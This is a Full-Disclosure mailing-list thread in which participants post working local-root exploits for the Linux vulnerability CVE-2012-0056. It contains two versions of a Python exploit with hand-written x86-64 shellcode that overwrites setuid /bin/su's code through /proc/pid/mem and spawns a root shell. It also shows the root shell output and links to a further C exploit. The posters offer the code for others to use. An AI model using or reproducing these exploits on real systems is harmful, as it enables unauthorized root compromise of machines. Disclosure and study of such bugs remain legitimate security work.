Re: [Full-disclosure] Linux Local Root -- CVE-2012-0056 -- Detailed Write-up



2012/1/23 Jason A. Donenfeld <Jason@xxxxxxxxx>:
NICE! Well, I guess posting that blog post defeated the point of not
publishing. :-D

Thanks for compliance with first full-disclosure famwhoring rule:
always post warez to make kids happy! :)

On a related note, here goes my "private" version which relaxes the
rules regarding file permissions on /bin/su (ie not world readable).
This is to point out you can just overwrite 8kb of .text (default
stderr buffer, more is possible, but without mere nops) instead of
juggling with objdump.

!/usr/bin/python
# CVE-2012-0056 amd64
# sd@xxxxxxxxxxxxx
#
# hg clone https://code.google.com/p/python-passfd
# cd python-passfd; ./setup.py build_ext --inplace; cd src
# mv ~/hurrdurr.py .
# ./hurrdurr.py
from socket import *
from passfd import *
from os import *
from socket import *
from sys import *
if argv[-1]=='hax':
sk=int(argv[1])
fd=open("/proc/%d/mem"%getppid(),O_WRONLY)
lseek(fd,0x401000,0)
sendfd(sk,fd)
else:
a,b=socketpair()
if not fork():
execl("/usr/bin/python","python",
__file__,str(a.fileno()),'hax')
dup2(recvfd(b)[0],2)
execl("/bin/su","su",("\x90"*8000)+"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2"+
"\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb"+
"\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6"+
"\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05");




So, here's my code:
 http://git.zx2c4.com/CVE-2012-0056/tree/mempodipper.c

I wrote the shellcode by hand too, and you can grab the 32 and 64 bit
versions from that same tree.

Have fun.



BTW, before I'm asked, the reason why I don't hard code 12 for the
length of the su error string is that it's different on different
distros.

On Mon, Jan 23, 2012 at 02:14, sd <sd@xxxxxxxxxxxxx> wrote:
2012/1/23 Jason A. Donenfeld <Jason@xxxxxxxxx>:
Server presently DoS'd, or dreamhost is tweaking again.

boring tl;dr - don't play kaminsky on us :)

#!/usr/bin/python
# CVE-2012-0056 amd64
# sd@xxxxxxxxxxxxx
#
# hg clone https://code.google.com/p/python-passfd
# cd python-passfd; ./setup.py build_ext --inplace; cd src
# mv ~/hurrdurr.py .
# ./hurrdurr.py `objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d '
' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'`
from socket import *
from passfd import *
from os import *
from socket import *
from sys import *
from time import *
if argv[-1]=='hax':
       sk=int(argv[1])
       fd=open("/proc/%d/mem"%getppid(),O_WRONLY)
       lseek(fd,int(argv[2].split('x')[-1],16)-12,0)
       sendfd(sk,fd)
       sleep(1)
else:
       a,b=socketpair()
       if not fork():
               execl("/usr/bin/python","python",
                     __file__,str(a.fileno()),argv[1],'hax')
       dup2(recvfd(b)[0],2)
       execl("/bin/su","su","\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2"+
               "\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb"+
               "\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6"+
               "\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05");

--
./hurrdurr.py `objdump -d /bin/su|grep 'exit@plt'|head -n 1|cut -d ' '
-f 1|sed 's/^[0]*\([^0]*\)/0x\1/'`
id
uid=0(root) gid=1000(sd)
groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),110(netdev),125(lastfm),1000(sd)
#!/usr/bin/python
# CVE-2012-0056 amd64
# sd@xxxxxxxxxxxxx
#
# hg clone https://code.google.com/p/python-passfd
# cd python-passfd; ./setup.py build_ext --inplace; cd src
# mv ~/hurrdurr.py .
# ./hurrdurr.py
from socket import *
from passfd import *
from os import *
from socket import *
from sys import *
if argv[-1]=='hax':
sk=int(argv[1])
fd=open("/proc/%d/mem"%getppid(),O_WRONLY)
lseek(fd,0x401000,0)
sendfd(sk,fd)
else:
a,b=socketpair()
if not fork():
execl("/usr/bin/python","python",
__file__,str(a.fileno()),'hax')
dup2(recvfd(b)[0],2)
execl("/bin/su","su",("\x90"*8000)+"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2"+
"\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb"+
"\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6"+
"\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05");

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages

  • Re: Tech: Williams System 4 MPU not resetting and booting
    ... I mostly have concentrated on Sys 6 and Sys 7 repairs and ... m ay point to a bad trace, socket pin or chip. ... This is generated by a Motorola 6875 clock chip, ... The test ROMs don't always test the blanking properly. ...
    (rec.games.pinball)
  • Re: [Full-disclosure] Linux Local Root -- CVE-2012-0056 -- Detailed Writ
    ... this one is OCD friendly (no spraying & detects prefix length). ... from socket import * ... from passfd import * ... from sys import * ...
    (Full-Disclosure)
  • Re: Perl Hacker, Python Initiate
    ... I'm lucky enough to be able to completely ignore Perl. ... import sys ... import socket ... See also getaddrinfo(). ...
    (comp.lang.python)
  • Re: how often do PIA chips fail?
    ... Like Gary mentioned the sys 3-7 driver boards take lots of abuse. ... Solenoid, Switch, Display) and also controlling parts of the Special ... Make sure you use a good socket when replacing the Switch matrix PIA ...
    (rec.games.pinball)